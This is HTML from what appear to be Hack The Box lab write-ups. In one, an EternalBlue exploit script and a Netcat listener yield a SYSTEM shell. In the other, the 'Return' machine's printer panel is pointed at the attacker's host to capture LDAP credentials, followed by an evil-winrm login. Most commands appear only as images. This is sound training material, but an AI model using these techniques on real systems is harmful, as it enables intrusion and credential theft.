url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC/0lEQVR42oVUV3bbQAzkUWKKZVmWvVeJklwk24nzcv+rIANQcouf8zEPXIoLYAYDGW55JLd9Ibt6Ir8+Unf8TfV8phaoxgeqhnvEE9XTidLmSBu//haGFbRk646cqCeVzhTmW7KChkyvIhMfcPxfkg8JnbAhJ2xJF1uKy53AT0eyg1qwUeUKj1GtkMvN1wmjfE2U1QfKQYljWu0pv0TLvyYtaONmb/CKrxPGOZJVuFzuKSkXJDlQgkQhulSQwnRzMp13sFO6sSJAk4kiprfKcpXGmPe/qN8+0bh7pgGxnx9pWp4phgRK9xSkEwXJKAX8qCMPRUKc/XgA8JxNpPNZoos5GEV7iw736HAhps/dakQVduRCWwdVGW6AwTHCnlw94LklC9RtULf9giwFGVROBndW9w+UlQdi+jrbinac8MZh3UDHrfGMqBBxZvywYpxLoSmU8Ww6KRktPBZlbzrGxUI5nsNkQtIe3XWIA3kRKOG8Rn4HF0CSf4bCVHV6oQofxvmCblcJNAoF8YTfjhjYEVLgt/oWRVE4g7UgyWqf5tVGBtsj5g4lyQpOULZ30iVrF8SzdKmikTwUUPEo+t7YTDsX7cRW0NMom1tqoGF+oZyiOkvAnUbQ09NME4n0iGnPGNyCibJ3D2KzKON3QMYuaNeE2/0LddMZw8HedvfUDidqgHY8C5r+JO9rRKabgEGIohpDjHAOIBUPjGkb8/KTpu0z/PdE+7s/NMKLYnIMJ8HHLIUfYSh6kC4tBa0+A+a+wogxEA0qMdOA/3gwfJmHYXsNdMI2OOUr2EYb2Og92FbSISdkOkw7kRVc14+7y/FXxsn9aBSwE1hTxspg1ZojW403SoGJ0UOjLdaPB9OxdtCxwzvB9ChSdKLlSc68AGIjJElFknUheHNswGi6O0nWQPQeFyrYJS248m69hG7cgA3eCkzeGKFfXegDqiLrquGM1auwz5yoG86SeCMXeO2u8e2yBa0+wPsII0cHCuP20K6LDhSMbPOHfFkSfMb3Cf8CGeh8UjTLduIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="shell_prep" title="" src="/static/32ef0609482846963717ecb3b63c7aa7/50637/shell_prep.png" srcset="/static/32ef0609482846963717ecb3b63c7aa7/dda05/shell_prep.png 158w, /static/32ef0609482846963717ecb3b63c7aa7/679a3/shell_prep.png 315w, /static/32ef0609482846963717ecb3b63c7aa7/50637/shell_prep.png 630w, /static/32ef0609482846963717ecb3b63c7aa7/b5c22/shell_prep.png 793w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Generated payloads:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f4f98f94462e3f6833cc6a9c70261402/a9fc9/shell_prep-payloads.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 14.556962025316455%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAq0lEQVR42jVOSRKDMAzjLyylrGFPMKFQhp0e+v/HqCYzPWhkaWzJlpftcNIDTjwiEj1afYIYqjtA/QXJfKPl+faqdoXtN3D+8GrYjJtvbXXj1yxK2qH0AUV8zLqsZ1RyMQUxF7lPCVFO6IaPCY3FC27YQnQbcr0jow1+TLCIQ4hNqRb+6ESjVkSpRpholM1svivqCSF7ST6AXhcaLhflGwEXPYoBfjUadgOJHwfaY4hgNesGAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="shell_prep payloads" title="" src="/static/f4f98f94462e3f6833cc6a9c70261402/50637/shell_prep-payloads.png" srcset="/static/f4f98f94462e3f6833cc6a9c70261402/dda05/shell_prep-payloads.png 158w, /static/f4f98f94462e3f6833cc6a9c70261402/679a3/shell_prep-payloads.png 315w, /static/f4f98f94462e3f6833cc6a9c70261402/50637/shell_prep-payloads.png 630w, /static/f4f98f94462e3f6833cc6a9c70261402/a9fc9/shell_prep-payloads.png 701w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I started a Netcat listener:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 324px; " > <a class="gatsby-resp-image-link" href="/static/c21b8a3096006e15b1e0b451f1e9329f/aec3a/netcat.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.746835443037973%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABL0lEQVR42m2Q207CUBBF+RBFpOdwB1sK9EahVG4tRcCYQIokJj6a+P9vy9OCSqIPK7Mzk+w9MwWtZSNbFsJcoHVXiN4OzYhyrekBou3Q9yO8yRp7vMIaRdiThDB6YTzfMZpuML058sFFNAYUaoMJ0o4RfkrZ3iO8FBmckMMU3X+ioeZuuCF5fmWWHIi3J+LdkeUmJdoeiVSdbQ5I/WKYOevBHsNP0J0phveIPpqhuyFTtcVguEQ0bWr6EK1pUayYFKXJrTC4lYpKV/W6aA0rnxfStw/cIMbyl+qcWOk1pjOn0wsx3QWuOq/Tn+AECS0zoG6MqKo3ZCFSIVpnMrPc8PT+SaXtcaeSS9U+97UL9UFeS9XeTy2rXka+zTXNXwo3mpE3s8Qz1/rM9/yP0T/GXzdBwtMjmIMiAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat" title="" src="/static/c21b8a3096006e15b1e0b451f1e9329f/aec3a/netcat.png" srcset="/static/c21b8a3096006e15b1e0b451f1e9329f/dda05/netcat.png 158w, /static/c21b8a3096006e15b1e0b451f1e9329f/679a3/netcat.png 315w, /static/c21b8a3096006e15b1e0b451f1e9329f/aec3a/netcat.png 324w" sizes="(max-width: 324px) 100vw, 324px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Since the target was a Windows 7 machine, I used the <code class="language-text">eternalblue_exploit7.py</code> script to run the exploit along with <code class="language-text">sc_x64.bin</code> as the payload:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 563px; " > <a class="gatsby-resp-image-link" href="/static/f0db066d15bdc76d8e780070cc4702cd/c6e12/run-exploit.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABO0lEQVR42m1Q7XKCQAzkUVoVtYpaBxDxOI5vDhCEirW10/d/jG042x/t9MfO5pLLJhtN3xYYm2fodg/DlnD9EsXxhlReUHefkMd3JMUFSX5BVl4RZb2qZdUbbCaxXHMsNxyrrcBi7UGzRA9TnGHxDrF8RdV8QFKjiFpkxRV+dCI02HsFocTuIOEFDWIS9uMWB16p/JAznRRaRJ/D4AjGcpi7FAZNG09t6HNH8XhmYzLfQX9yFE+G/MxR9YeJiUfdwoj+/bCW5T0C2iKMT2RriFvwoFaxiDvkZDemOEo7BEmHMHkh22c8WxEN2f8GDdEYWRFhA4+XcNwMXNTYswIBiblkJaHmqr6ReKtENmaIrR3R9vdt/0Iz7RAL4wBjzYhdLFceZjTNGI5NR17Q29j4xEzZH02t7zM4/wp+Ad23yeef027iAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="run exploit" title="" src="/static/f0db066d15bdc76d8e780070cc4702cd/c6e12/run-exploit.png" srcset="/static/f0db066d15bdc76d8e780070cc4702cd/dda05/run-exploit.png 158w, /static/f0db066d15bdc76d8e780070cc4702cd/679a3/run-exploit.png 315w, /static/f0db066d15bdc76d8e780070cc4702cd/c6e12/run-exploit.png 563w" sizes="(max-width: 563px) 100vw, 563px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">nc</code> caught a shell as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 533px; " > <a class="gatsby-resp-image-link" href="/static/f54c9d7c115c5b3e839bdc61ac437ce1/05dcd/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABRElEQVR42nWR2XLCMAxF+ZQCaSEhe5wdZ8EhCVspW///T24VpWX6wsMdW/L4SFeaaKLDLLxgHj+giQP0oEDRXFC2V5TdFc3xG2r/gBXVmOkRtFVMil5qYuZnmEmPVdbDk3sEWQsn2sASFXRXQvcklu4amplibsSYvwC+m7/A9vBAuT1DqhN3Uvc3pNURkewh8g5e0iBXZ2z2d7iJgpduqSgpbeCnihWQZroYgWv1iaQ88OesPkE2XxxnBB3AQd6i6m70doQZlDD8AlZQUSGCx4OTku82nQwcLIbrnm3aYc3gIRfJHZxwg4WVM2jlE8wr8GFlWNg5Q02CG76kfxW9yxGodnfuZLDmxYONLWyCu7HC0skxXYZPDUv5E8ecE5jqAc03HIGCZiFoJk6kGDJ0p9MS3hbhvyWM4viZS6AZY/6dNS7lBxUB5B5JEbvLAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/f54c9d7c115c5b3e839bdc61ac437ce1/05dcd/system-shell.png" srcset="/static/f54c9d7c115c5b3e839bdc61ac437ce1/dda05/system-shell.png 158w, /static/f54c9d7c115c5b3e839bdc61ac437ce1/679a3/system-shell.png 315w, /static/f54c9d7c115c5b3e839bdc61ac437ce1/05dcd/system-shell.png 533w" sizes="(max-width: 533px) 100vw, 533px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-return/https://mgarrity.com/hack-the-box-return/Sun, 12 Nov 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f8d92f2df45d8f8afe9d654aaf6af350/3b67f/return.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAUlEQVR42mMQkdX+jxPLaf8Xltb+LyihA+fjVQ/EDLgkRIGaBSSAtJLGfyldlf+8UmpAgyHiJBsI0gTSrGam+z88Keh/e1vF/96pMf+VjHT+C0riNxS7C2WAXlRU/x+fGfzfLWTW//2LFv4/OX/+/5DUkP+iCuoQeaINlIOEmaKJ2v+EuIL/1inT/s88nPjfPnnS//j4/P+Khhp4XYnThULy6v/TS0L+H1mx9P/seUv+1xbP/h+THvRfhGQXwiJEXPu/qqn2//La4P+Npfn/k7KD/isbaxOMGIKxzCul/l9SW+O/kJw60DAtgkmHAZ8kyFAxOaD3pHX+i8rqEEwyIAMB1PsKlKWJLjsAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Return" title="" src="/static/f8d92f2df45d8f8afe9d654aaf6af350/50637/return.png" srcset="/static/f8d92f2df45d8f8afe9d654aaf6af350/dda05/return.png 158w, /static/f8d92f2df45d8f8afe9d654aaf6af350/679a3/return.png 315w, /static/f8d92f2df45d8f8afe9d654aaf6af350/50637/return.png 630w, /static/f8d92f2df45d8f8afe9d654aaf6af350/fddb0/return.png 945w, /static/f8d92f2df45d8f8afe9d654aaf6af350/3b67f/return.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Return is a Windows machine running Active Directory. A webpage featuring a printer admin panel can be leveraged to reveal LDAP credentials, allowing for a shell to be obtained on the system via WinRM. Enumeration leads to the discovery that the user is a member of a privileged group, granting them the ability to modify local services. This privilege can be exploited by editing the binary path of a service to execute a payload, resulting in a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/beb307dc4c4ec34e04ff06750eb123da/dfb88/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 89.24050632911393%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC5UlEQVR42oVU13LbQBDjp0SNRRJ7J8UmUsWyJNvKpEzy/9+BYI9ynJlokgfMsh0OwO5RM+MDrPIbjPwNVtKjOdxwvP7A6fUnDpfvCMsD7KiD6ZZYrAvodq4wX6aYPYC22b6gaJ9RDxek9QlRuUfZnpFWT4iKPRLWrHlGVj9jFTRYhy3RYL7KHhN2+xuS8oh2/xlbYnj6gmRzVERpdYKfDfCoXF/n+KSHmJoRJkaIGetvWDGRjIRN/4owHZBzcbW9oqCamRmznrE7fVXPEtp2adumwpmZYG6l6hsFI8LUCDDVfVYfWrZ5QkE7pdgiaZzvleKcz1K+86luwZ1FodQp1U1EqR7cwetFgMnCw2TuQIvynSKr+xcE6Y4YEJHUZxXlpl2QKFPQVzmMtaAYwXem3K9S1kxdaynz8pMtgmSgugOVneAyeCHNK6renLjhWSmWDcT2yquwdApY7PbS2cByee/xud9Cq7qLsiwZSk1p16CSor6gHW6ouhf0h88qS4lANl37DWwudsMe66BTZHYotYaW8INMMiOh5ClqhDSkfdl9asSqETODzTBTgvYtzuKSM7kqCUZC6OtSZazVnEMhSoqDgqjx4y2zK+Fwdz/qVRxetOV9y9rTdksXpSKfCaw72HWtIWE3vEGI6+6K7e6GIO6pctzE5WLJzgtHQlfVTll2eG0HW5WdE0ltoInVdwhBO7yibq8I47HLSpFkRpJRIQmZVxCP70Th3JKjOELzqcbjB9JZm90z5IXkRSw4wNKgBe3oy/wBitHyH9Y1Cb+iorI+I8l2CCUvbmAx5JnOY8WmzM33hjxC9pEloXlU1jC7mj+EgraFUMgEos6UP8wy/QfhB6lAs90NCo5JKWNTHBFRse3WtM8/CwfWpVohFqUyOv+DFsih50KpHk+BywY4ikxI78TMVhojTZF7Vd+Hm02SRsl4SdVSObf8wOFin/ZDzqCQypi4XODLgnvTBOPAV/dG/d2sX5jRR6KSvP9OAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/beb307dc4c4ec34e04ff06750eb123da/50637/nmap-scan.png" srcset="/static/beb307dc4c4ec34e04ff06750eb123da/dda05/nmap-scan.png 158w, /static/beb307dc4c4ec34e04ff06750eb123da/679a3/nmap-scan.png 315w, /static/beb307dc4c4ec34e04ff06750eb123da/50637/nmap-scan.png 630w, /static/beb307dc4c4ec34e04ff06750eb123da/dfb88/nmap-scan.png 733w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>53 (DNS)</li> <li>80 (HTTP)</li> <li>88 (Kerberos)</li> <li>135, 593 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>389, 3268 (LDAP)</li> <li>636, 3269 (LDAPS)</li> </ul> <p>Active Directory:</p> <ul> <li>domain name: return.local</li> <li>hostname: PRINTER</li> </ul> <p>Webpage on port 80:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8c0dc7060a13f26c0a5c2801f7434e73/730f3/printer-admin-panel.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.06329113924051%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABhElEQVR42pWSTUsCURSG/Su1sSJa1K4WhdSi/k+LIIo+sUWLogiCiFxUhATFkGmmNqmZIaRmKpYz4/i10FEDRWd03u4dqJVDeeHhHIZznzn3nmsYMq1j0LSGkZlNDE9vwDi1igHC6KwZY3NmGCdX0De+hP6J5X9hyOQkCFkJNIpaXv6FF0sQyDc+SylrdbxIYq6ixW4YoLOKxTySyQQ47hMCz4FLp8CTnEt/QMwIettgUFUV3Wi3O+h0VEKH5G0oBBplWdbQ26fbIRVUKxVEI2FkxQyq1QokSYKiKBr0R1071BOmEnG4Hbe4Ya7x7PfizsbAemqBnblCo1HvTSjLLfgeXHA5bIiEggj6WJyfHGFxYR6H+zsol0tQ9e5QTxh49OCFiEIBL55YF6xnFuxtb4G5vIBMjtwm/FtIj/MWjcDLeuAnYp/nHscHu/B7nBDIlANeFl+1mlZLB/GnkBY1m0006g3kCwW8x6Jwu12IhF/htNuQiMf0nw16WHS6rVara2c/wm8NTxvDjoxDKgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="printer admin panel" title="" src="/static/8c0dc7060a13f26c0a5c2801f7434e73/50637/printer-admin-panel.png" srcset="/static/8c0dc7060a13f26c0a5c2801f7434e73/dda05/printer-admin-panel.png 158w, /static/8c0dc7060a13f26c0a5c2801f7434e73/679a3/printer-admin-panel.png 315w, /static/8c0dc7060a13f26c0a5c2801f7434e73/50637/printer-admin-panel.png 630w, /static/8c0dc7060a13f26c0a5c2801f7434e73/fddb0/printer-admin-panel.png 945w, /static/8c0dc7060a13f26c0a5c2801f7434e73/730f3/printer-admin-panel.png 970w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>On the settings page, the only field that seemed to accept input without immediately changing back to the original value was the Server Address:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3bae71b1946f21bad3ef86f5a0a24a5a/9d8f4/printer-admin-panel-settings.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.734177215189874%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHUlEQVR42p2SX0vDMBTF+0H0RYSBgo/6IMhQ/FQK/sUPOFu6WWfd0jZNardV2sbW0mN6x4aTadULP27CTc45hBid7hW2jy6xe3KLrcMLYuf4Bnund+h0r7Gxf7Zk8+C8FWMwFOg/Cjw8Sd1DWg/02nElmpndzNxI719gO2ErBlqKjZ/Rty247hC/KaOuayxYV2VZIs8VcqXWnvt8v2ElYRzH8H1f94kWeofSIjzg4DyEjCISVuoNRVEs+WqwIug4DkzTBGMMQRBQH43GmGiD6XSGJHklcc/zyJhzjqqqvheUUpBQnudEmqYkKoSkZFmWEYt5w48JLctCr3dP7k2KBiEEZrOE0s0TcjJhzCPzloQRXZ4/Nv5Vrd+m/qPyB1Bu3JgFQlk/AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="printer admin panel settings" title="" src="/static/3bae71b1946f21bad3ef86f5a0a24a5a/50637/printer-admin-panel-settings.png" srcset="/static/3bae71b1946f21bad3ef86f5a0a24a5a/dda05/printer-admin-panel-settings.png 158w, /static/3bae71b1946f21bad3ef86f5a0a24a5a/679a3/printer-admin-panel-settings.png 315w, /static/3bae71b1946f21bad3ef86f5a0a24a5a/50637/printer-admin-panel-settings.png 630w, /static/3bae71b1946f21bad3ef86f5a0a24a5a/fddb0/printer-admin-panel-settings.png 945w, /static/3bae71b1946f21bad3ef86f5a0a24a5a/9d8f4/printer-admin-panel-settings.png 973w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So to check if any data was getting sent over port 389, I started a Netcat listener:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 332px; " > <a class="gatsby-resp-image-link" href="/static/73a6b74638284179bccf2da71104edf4/ca0b1/netcat-389.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.21518987341772%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABI0lEQVR42j2OyXaCQBQF+RETgQbBAUWhGRQQHI9xQo1J1tnkA/L/lZbkZFHn3ncX1a2JfoLtxVjhDhGeEdEdMTlhBmeMYY7tZ+TrC8XqQr6qmVZHFrtXNsePJrPq1GyDqMJwJZoj59jpETO5o4c1IrliFe900hupEvWCgrQ8UG2vFOpeHz4oVZ9vb0p4p9xcmxwmS3QnROsMYiZZTVTskdMlcrYgmFWMZc56WxPGFXY3QCYL2sKj1e7R0vu0jIHC40n4tCxfySRmN0b7/PomK/f0/YKRXDKJ16rP6Y5yvKDEj5b0xwVBssIZJHSHKaIzxrR9xQjTGjZpPDZX/XDz8obrzWhbE/RO+IfEUC/+36o/20GzPTDdSCF/cYJGpiuxLjx+AFgOozFaLq3vAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat port 389" title="" src="/static/73a6b74638284179bccf2da71104edf4/ca0b1/netcat-389.png" srcset="/static/73a6b74638284179bccf2da71104edf4/dda05/netcat-389.png 158w, /static/73a6b74638284179bccf2da71104edf4/679a3/netcat-389.png 315w, /static/73a6b74638284179bccf2da71104edf4/ca0b1/netcat-389.png 332w" sizes="(max-width: 332px) 100vw, 332px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I inputted my machine's tun0 IP address into the Server Address field:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/aa5d022c128098d314dea1d8ea35585f/7df1d/settings-set-address.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 52.53164556962025%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABX0lEQVR42oVS2W7CMBDk/7+oUukLlfoQ2hd6QsmhJA5JyH2hnFN7qWlIKV1pYnl3M94Ze4Yr0TQ18jxDURSoqgpd1+G/mInPMAwnyL0Ih9lYLBZQFAXz+S38/f6sfpFwWhyTjyt9358deAlEWNc1ScrznDA+QOTDMEIcJ1x+S5LbtiXyaZwI4yiCut1C0zQYhoE0TZFlGZEzxmCaFjzP5zlxYEGr7JEQ+8PhcCRktg1lucTqeUWkuq5/rxo2m0/sgxAlv5As/SGwLAuqqlKfwJYPFATBkVAw71wXIU9In+T4Qq6uG5zARllW3IKSJqzr5peX0oaZ73t4fVlhvf6Ay4nHME2TJEdRzGVlhCTJyIJxn+M4JJsIbebi/uEJb+8b7HjB5r4J72xuhed5SHhjWZY0nYTIizr77hUWJElyJLR2MW7uHsH4eumNSTnT5/HnLff9gLrp0E1+ukZw7R1+ASHGT9CEXUY9AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="settings set tun0 address" title="" src="/static/aa5d022c128098d314dea1d8ea35585f/50637/settings-set-address.png" srcset="/static/aa5d022c128098d314dea1d8ea35585f/dda05/settings-set-address.png 158w, /static/aa5d022c128098d314dea1d8ea35585f/679a3/settings-set-address.png 315w, /static/aa5d022c128098d314dea1d8ea35585f/50637/settings-set-address.png 630w, /static/aa5d022c128098d314dea1d8ea35585f/7df1d/settings-set-address.png 702w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>What looked to be a password for the <code class="language-text">svc-printer</code> user was revealed:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 506px; " > <a class="gatsby-resp-image-link" href="/static/6b196ad32649aaf69f0ede6e54fb96b3/f6694/svc-printer-ldap-creds.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.050632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBklEQVR42lWQ61KDMBSEeRXlXmgFEpIQhHIvbZXOoI7v/yTrIfhDf+zMnks2X2J5bIbDVjjiEx5fEKY1yvqOblzRDSuG6Qvz/dvUoqTdQMANFZxQkpfGGwV7bUXqgSifERVXJPoGRYdesgZZPiA+VYhIcVIjPGp4B4VnL/+npz/eBG63t92C+nxD1z+I6ANVs6A6v1Nwi4R1OKUNUb8Z8jTvwNUEJkckvCeAKzI5IS8uCCINS+kLZDGCiwGSFnM5QBRbb0ZGB5gYibaH1DNS3hrKMC4RbKKAw/HV+K23Pd2yXQbH47vcXRu+TUp/AxPW4kTfEMSaZhy2T3NfwPEl7QnjTR1I/ACdjqI2md2bgAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="svc-printer LDAP creds" title="" src="/static/6b196ad32649aaf69f0ede6e54fb96b3/f6694/svc-printer-ldap-creds.png" srcset="/static/6b196ad32649aaf69f0ede6e54fb96b3/dda05/svc-printer-ldap-creds.png 158w, /static/6b196ad32649aaf69f0ede6e54fb96b3/679a3/svc-printer-ldap-creds.png 315w, /static/6b196ad32649aaf69f0ede6e54fb96b3/f6694/svc-printer-ldap-creds.png 506w" sizes="(max-width: 506px) 100vw, 506px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The credentials successfully authenticated and <code class="language-text">evil-winrm</code> was able to make a connection:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/724dd625060b18d3d1d49e7c545bea02/9f2f1/evil-winrm-svc-printer.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.69620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB/0lEQVR42l2T6ZKbMBCE/SgxeDkFSCCJ24CPxXZVkqpU5f0fpdPC3mw2P76SRpaa6ZnxLiwXhPYHAvsToZowzg/Ml184rb/Rz99RmhlCGASRRJiUkHmJTJQ4xBqHpP6CT3aeOMHLLtgTL11wEGf46RFeMmAft3zYwAsUYz4SDUJR441i+zeJb2+KdxpSb7g7u1EbOGZj0VeE+8lojKQuGZcKky6guZfSQCtSGlRKQ2U5GiVhGNtK83eLnZUtD1t0RBc9hqqncIemYqw6WF7qVIVcDojEgDjrPxE9krTdVheH3O+i5Iw4vfJw/btG4oYD7fvpzLostNzRJkkaBGlHegQUDz9Ih+3skFCwKGaUcmHaJ5j6itzeIfRKrsjMiry+8+yGVB2RqR77wNWu4OpgbWOz1c5LLD/uLOe0yHRPRYu5n2G7BzSFq2aFaVfU4wN2uKPQZ6TFEaq+IJEjvEhvzfIdbJL/0eU4tBDskIwtsrxFXp2Qly+qM6S5bmdhNsCPGtp64r/wwpJUFDVPQT+qITiLKYmykbYmJPlAjsxoYrxsddoHlg+ZBe/78T9EFGK2fmyfghXtBZylg7vMbGNm4qxqWk7zcRNy2ZrmBqU5q5H9KujmLzKflvNyZlfZIX7Z7XXzvmXpRDM5sU78l7B7RbVAGdavGDns/2X5ys4J/gEq01ptnom0JAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm svc-printer" title="" src="/static/724dd625060b18d3d1d49e7c545bea02/50637/evil-winrm-svc-printer.png" 